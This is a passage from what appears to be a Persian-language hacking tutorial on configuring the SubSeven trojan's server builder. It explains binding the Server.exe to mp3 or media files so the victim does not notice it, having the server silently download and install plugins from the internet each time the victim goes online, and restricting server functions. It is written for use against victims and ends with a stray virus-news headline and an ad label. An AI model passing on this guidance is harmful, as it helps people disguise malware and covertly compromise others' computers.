گزينه binded files : در حقيقت صفحه اصلي اين گزينه اهميت زيادي دارند ، بدينصورت كه مي توان فايلهاي اجرائي و استخراجي را به Server طراحي شده خويش الصاق كرده و بابت اين است كه دريافت كننده Server يعني شخص هك شده متوجه اصل هويت فايل Server.exe نشود . كه اگر اين فايلهاي اجرائي يا استخراجي كه شما از هارد خويش انتخاب مي كنيد به فايل اصلي Server.exe الصاق شود به محض اجراي Server آن فايلها هم اجرا مي شوند . عزيت اين كار اين است كه مي توان فايل اصلي Server.exe را با يك فايل اجرائي ، مثلا : فايلهاي صوتي و تصويري الصاق كرده و هويت اصلي آن Hidden يا مخفي شود و همچنين اگر فايل اصلي Server.exe را با فايلهاي استخراجي الصاق كنيد ، پس از اجراي Server فايلهاي استخراجي جدا شده و در همان محل نمايان مي شوند . تذكر : در اين جا فايلهاي اجرائي همان فايلهاي صوتي يا تصويري mp3.* و … مي باشد و فايلهاي استخراجي همان فايلهاي txt.*مي باشد و به صورت يك متن دلخواه مي تواند باشد .
با انتخاب كردن كيد add web plugin شما مي توانيد plugim هائي از اينترنت دريافت كرده و بدون اينكه شخص هك شده متوجه شود با هر بار برقراري ارتباط با Server در كامپيوتر Victim ، پلاگينهائي از اينترنت , خوده Server دانلود كرده و روي Victim نصب مي نمايد . تذكر : براي اين كار مي بايست آدرس معتبري را در قسمت خواسته شده وارد كنيد كه هر بار Victim به اينترنت وصل مي شود plugin هاي مدنظر بر روي Victim بوسيله Server كار گذاشته شود كه با وجود plugin هاي موجود در پوشه Sub Seven احتياجي به فعال كردن اين گزينه نيست .

گزینه restrictions : از اين قسمت براي محدود كردن عملكرد Server استفاده مي شود . با فعال كردن گزينه enable filter و فشردن كليد add allowed feature مي توان دستوراتي را كه در نظر داريد توسط Server اجرا شود را انتخاب كنيد ، كه اين دستوارت نيز در قسمت Clinet وجود دارد .

شايع ترين ويروس ها و كدهاي مخرب كشف شده در ماه نوامبر 2006 اعلام شد

تبلیغات